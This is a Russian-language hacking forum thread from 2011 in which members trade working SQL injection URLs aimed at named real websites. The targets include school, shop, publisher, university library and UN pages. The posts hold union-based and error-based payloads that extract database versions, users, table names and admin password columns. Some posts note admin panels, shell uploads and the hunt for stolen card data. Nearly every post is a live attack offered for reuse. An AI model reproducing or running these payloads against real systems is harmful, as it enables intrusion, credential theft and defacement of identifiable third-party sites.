http://brest-school-20.by/stat.php?id=999999.9+union+all+select+concat%280x7 e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+ char%29%29%29%2C0x27%2C0x7e%29%2C0x313032353438303 03536%2C0x31303235343830303536%2C0x313032353438303 03536%2C0x31303235343830303536%2C0x313032353438303 03536--
shadowrun
24.11.2011, 19:21
BLurpi^_^ said:
Code:
http://love.pankotskiy.ru/stat.php?id=1
Code:
http://www.blog-seo.ru/index-stat.php?id=6
Code:
http://www.blog-seo.ru/index-stat.php?id=-6+union+select+group_concat%28column_name%29+from+ information_schema.columns+where+table_name=0x646c 655f7573657273+--+
Code:
http://love.pankotskiy.ru/stat.php?id=-1%27+Union+select+1,2,3,4,5,6,7,8,9,group_concat%2 8version%28%29,user%28%29,database%28%29%29,11,12, 13+from+information_schema.tables+--+
Примерно так... Просто докрутил.
kallstrom
24.11.2011, 19:44
Этого вроде не было... Учите английский!))
http://www.study.ru/test/test.php?id=91' AND (SELECT 6886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,121,98,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,122,110,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'ivlg'='ivlg
PR=4
тИЦ=2800
Alexa=71,160
kallstrom
24.11.2011, 20:51
Аренда квартир в Москве
http://english.fortline.ru/page.php?id=152' AND (SELECT 8467 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,116,117,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,105,117,114,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'ePMO'='ePMO
PR=6
тИЦ=110
Alexa=481,897
тИЦ: 450, PR - 6, Alexa - 1,255,744.
http://www.rfdeti[я_не_при_делах_
].ru/announce.php?id=364-999.9+union+select+1,name,3,pwd,5,6,7,8+from+accou nts--
5.1.49-1ubuntu8.1
rfdeti@192.168.0.1
DB: rfdeti
PRosTo_LEva
25.11.2011, 00:44
ТИЦ: 150
http://www.lina-shop.ru/catalog.html?item_id=-99999+UNION+SELECT+1,2,user()+--+
lina-shop_mysql@10.1.135.208
5.1.36-log
kallstrom
25.11.2011, 01:31
Шины Dunlop
http://www.dunloptyres.ru/tyre.php?id=172 AND (SELECT 5813 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,115,112,58),(SELECT (CASE WHEN (5813=5813) THEN 1 ELSE 0 END)),CHAR(58,115,111,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=4
тИЦ=250
Alexa=439,159
PRosTo_LEva
25.11.2011, 04:06
Весьма бесполезный ресурс:
http://www.thegotomom.com/blog-post.php?id=-1+union+select+1,user(),version(),4,5+--
thegotom_momdb@localhost
5.0.92-community
PRosTo_LEva
25.11.2011, 09:40
http://www.radiesse-voice.com/pages.php?id=-1+union+select+1,2,version(),4,5,6,7+--+
5.0.27-community
Всё классно.. с авторизацией так и не разобрался.. таблица паролем admin_pass
PRosTo_LEva
25.11.2011, 10:30
http://prophecywatchministries.org/pages.php?id=-1+union+select+1,2,version()+--+
5.0.92-community
http://www.johnsonpublishing.com/page.php?id=-1+union+select+1,2,version(),4,5,6,7+--
4.1.22
хочу плюсик (^^,)
stepashka_
25.11.2011, 14:17
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,column_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+inform ation_schema.columns+where+table_name=0x57505f5553 455253+--+
Нет доступа
http://www.board.maxido.ru/ind.php?id_typ=113+union+select+1,2,3,4,5,version( ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+--+
4.1.25-log
http://crimeahouse.net/doska/ind.php?id_typ=6+/*!union+select*/+1,2,3,4,5,/*!column_name*/,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+information_sche ma.columns+where+/*!table_name*/=0x6a6f735f7573657273+--+
http://berdoska.com.ua/ind.php?id_typ=110+union+select+1,2,3,4,5,6,column _name,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from +information_schema.columns+where+table_name=0x6a6 f735f7573657273+--+
tabletkO
25.11.2011, 14:49
stepashka_ said:
Нет доступа
А так?)
HTML:
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,column_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+inform ation_schema.columns+where+table_name=0x57505f5553 455253--+1
Выводит пасс:
HTML:
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,USER_PASS,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+timon_re mstroynn.WP_USERS--+1
stepashka_
25.11.2011, 14:59
tabletkO said:
А так?)
HTML:
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,column_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+inform ation_schema.columns+where+table_name=0x57505f5553 455253--+1
Доступа нет к USER_PASS
stepashka_ said:
Доступа нет к
USER_PASS
просто таблица в другой базе лежит.
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_l ogin,user_pass),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1+from+timon_remstroynn.wp_users--
kallstrom
25.11.2011, 19:34
MapLib.net - Make your custom Google Maps out of any pictures
http://www.maplib.net/people.php?u=klemperer' AND (SELECT 9066 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,112,97,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 8,1),CHAR(58,113,100,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'xhVm'='xhVm
PR=5
тИЦ=20
Alexa=569,559
BLurpi^_^
25.11.2011, 20:25
http://ledi.ru/news.php?id=223%20union%20all%20select%201,2,3,4,5 ,6--
ТИЦ 100 пр=4
kallstrom
25.11.2011, 23:10
Издательство «Учитель»
Не надо было оставлять старую версию сайта! Через нее и получаем доступ к актуальной базе:
http://old.uchitel-izd.ru/index.php?option=content&task=view&id=22 AND (SELECT 1816 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,110,101,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,118,118,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=5
тИЦ=140
Alexa=2,098,739
PRosTo_LEva
26.11.2011, 09:08
stepashka_ said:
http://crimeahouse.net/doska/ind.php?id_typ...........>>>
По твоим стопам! Спасибо за подсказку.. =)
ТИЦ: 60
Версия бд 4
http://www.jeleza.net/ind.php?id_typ=1+union+select+1,2,3,4,5,6,7,versio n%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+--
Ну и еще пару добрых и простых скулей)
ТИЦ 150
Версия базы 5
http://www.niva.vn.ua/photo.php?num=-1+union+select+1,version%28%29+--
ТИЦ10
Версия базы 5 - читается классно.
http://krynycya.org.ua/index.php?cPath=-1+union+select+1,table_name,3+from+information_sch ema.tables+--
Вот (^^,) Бог завещал делиться?)))
Ни много, ни мало -Хостинг
Site:www.geromail.com
PR=2
Alexa=10 795 098
Inject
Code:
_ttp://www.geromail.com/search.asp?cmd=Search+Scams/Virus&q=1234'/**/and/**/'a'='a
Version:5.0.51a-community-nt
Database:support
User:support@localhost
Крутил через Time-Based SQL, поэтому привожу структуру таблиц. чтоб никто зря не терял времени =)
Структура таблиц
cur
Code:
active
crat
cdec
csuf
cpre
cdsp
curr
id
curhdr
Code:
upddte
curdte
id
masq1
Code:
guid
vir
htm
msg
sbj
att
dat
shwfr
fr
frip
masqdef
Code:
vdsc
vfix
vurl
vnam
masqrem
Code:
cstt
crem
cmsg
crat
ccnt
ceml
cnam
cip
cdat
guid
id
rip1s
Code:
cnts
dsp
cto
cfr
cnt
stepashka_
27.11.2011, 00:46
http://vetwell.ru/board/index.php?id_typ=248&id_land=1+union+select+1,2,3,4,5,6,concat_ws(0x3a, user(),version(),database()),8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8+--+
VETWELLR_BOARD@LOCALHOST:5.0.92-COMMUNITY-LOG:VETWELLR_BOARD
tabletkO
27.11.2011, 15:14
Сервис прогона по каталогам
HTML:
http://christiantraffic.com/affiliateSignUp.phtml?ID=-1'+and+1=1+union+select+1,2,version(),4,5,6,7,8,us er(),10,11,12,13,14,15,16,17,18--+1
kravch_v
27.11.2011, 23:34
Code:
http://www.rovalis.com/menu.php?id=999999.9+UNION+ALL+SELECT+%28select+co ncat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696 E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C 0x31303235343830303536%2C0x31303235343830303536%2C 0x31303235343830303536%2C0x31303235343830303536%2C 0x31303235343830303536--
База данных: rovalisnew2
kallstrom
28.11.2011, 00:00
FOX — Redefining Ride Dynamics
http://www.foxracingshox.com/buy.php?m=bike' AND (SELECT 3140 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,103,100,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 2,1),CHAR(58,120,107,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'oBvH'='oBvH
PR=6
тИЦ=50
Alexa=139,870
shadowrun
28.11.2011, 00:52
Code:
http://www.muptis.ru/news_podr.php?id=-28+Union+select+1,2,3,group_concat%28username,pwd% 29+from+users+--+
База данных научных публикаций в сфере информационных технологий
Code:
http://www.it-science.ru/index.php?page=journal&id=COMPUTERS+%26+MATHEMATICS+WITH+APPLICATIONS%27+ and+1=0+union+select+1,group_concat%28table_name,0 x3b%29,3,4,5+from+information_schema.tables+where+ table_schema=database%28%29+--+
[stranger]
28.11.2011, 02:32
Code:
http://www.vniispk.ru/apple.php?key=-106+union+select+1,2,3,(select+concat_ws(0x3a,user (),version(),database())),5+--+
Яндекс тИЦ 70
Google PageRank 3/10
PRosTo_LEva
28.11.2011, 06:20
Ruslan1817 said:
http://rstcenter.com/forum/43713-%5Bsql%5D-samsungmobilers-ro.rst
тьфу.. =(
Вот так тогда (Ход лошадью):
http://asnapress.net/entry.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11, 12,13--
версия базы 5
tabletkO
28.11.2011, 11:21
Shop
HTML:
http://www.plcmusic.co.uk/plcshop_page.php?id=35+union+select+1,user(),versi on(),database(),5,6,7,8,9,10,table_name+from+infor mation_schema.tables--+1
kallstrom
28.11.2011, 16:55
Дайверские фотки.
http://www.visualdiving.com/gallery.php?id=vd_gc01 AND (SELECT 13 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,100,105,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,104,117,113,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=4
тИЦ=10
P.S.: Там 6000 баз, я офигел))
http://www.mos-stroi.ru/cats.php?id=-94600+union+select+1,2,3,4,5,table_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29+from+information_schema.tables--+
4 символа
kravch_v
29.11.2011, 00:23
lightangel said:
http://www.un.org/spanish/News/focus.asp?focusID=13%27
Code:
http://www.un.org/spanish/News/focus.asp?focusID=convert%28int%2Cdb_name%28%29+CO LLATE+SQL_Latin1_General_Cp1254_CS_AS%29+and+1%3D1
Юзер: spwebnews
SQL Версия: Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
База данных: SpanishNews
PHP:
http://new.yalta.ua/dosob/index.php?id_typ=1+union+select+1,2,3,4,5,777,conc at_ws(0x3a,user(),version(),database()),8,5,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
NEW_OLEVER1@192.168.2.5:5.0.51A-LOG:NEW_DOSOB
tabletkO
29.11.2011, 08:13
SHOP
HTML:
http://www.locknlock.com.au/products_c.php?cate1=5&cate2=1&item_seqno=-219+UniOn+sEleCt+antidef+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,version(),user(),con_cat_ws(0x3a, seqno,adminid,passwd,status,grade),21,22,23,24,25, 26,database()+from+admin_01t+LiMit+1,1
HTML:
http://www.locknlock.com.au/admin/
шелл льется за 0,00001 сек
З.Ы. По правилам нельзя выкладывать пасс/хэш. А я и не выкладывал =) Но все же поставил защиту
PRosTo_LEva
29.11.2011, 08:17
tabletkO said:
SHOP
шелл льется за 0,00001 сек
Семён Семёныч... нельзя такие скули выкладывать по правилам.. Школоло задефейсит..
И чтобы не быть голословным:
Толка ноль, но ради количества таблиц стоит посмотреть))
http://sayna.depar.ru/profile_view.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22+from+information_sc hema.tables--
http://www.abi-nn.ru/profile_view.php?id=-1+union+select+1,2,3,name,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+from+users--
stepashka_
29.11.2011, 13:39
http://www.garo.cc/item.php?id=-879+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,0,1,2+--+
5.0.90-log:u7114@10.8.1.184:u7114 0
http://www.unitedparts.ru/catalog.php?id=2+union+select+table_name,2,3,4+fro m+information_schema.tables
4 символа
stan0009
29.11.2011, 21:18
сегодня решил поискать картона...
нашел пару бесполезных для такого дела скулей...
шлю вам)
админка прилагается)
P.S.: крутил только до версии, дальше думаю все понятно, т.к. mysql=>5
типо нашего avito.ru
http://www.fast-buy-sell.com/view_ad.php?id=-1178+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conca t_ws(0x3a,version(),database(),user()),14,15,16,17 ,18,19,20,21,22,23
туры по чернобылю
http://tourkiev.com/chernobyltour/showdate.php?id=-531+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11
kallstrom
29.11.2011, 22:58
Флэш-игры
http://www.swfplay.net/game.php?id=28) AND (SELECT 7673 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,98,118,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,115,115,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (7357=7357
PR=3
PRosTo_LEva
30.11.2011, 01:33
Интересная какаято хрень.. вычитываются все базы хостинга..
http://www.springfieldpccc.com/event.php?id=-1+union+select+1,2,3,4,5,6,7,8,user%28%29,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34+
PRosTo_LEva
30.11.2011, 06:05
Домен ничего так.
Версия базы 5
но шанс залить чтото похоже ничтожен.
http://www.ccrw.org/conference/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--
Еще кое что:
Версия базы 4, админку не нашел..
Тиц 10
http://www.kobyakoffstudio.ru/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,user%28%29--
Code:
http://www.libraries.wvu.edu/databases/database.php?id=-361+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21--
systems@localhost:5.0.77:databases
Google PR: 6
Code:
http://www.rosalcohol.ru/site.php?id=-28+union+select+1,2,3,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,5,6,7%20from%20use rs--&table=cHJpdl9vdHI=
rosalc_ria-arbitr_ru@zvm34.host.ru:4.0.27-log:rosalc_ria-arbitr_ru
Google PR: 3 ТИц: 130
kallstrom
30.11.2011, 11:53
Національна спілка кінематографістів України
http://www.ukrkino.com.ua/news.php?id=2196
[QUOTE="None"]
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2196 AND 3755=3755
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=2196 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,105,107,112,58)
,IFNULL(CAST(CHAR(114,105,79,117,70,72,119,101,79, 115) AS CHAR),CHAR(32)),CHAR(5
8,119,101,105,58)), NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot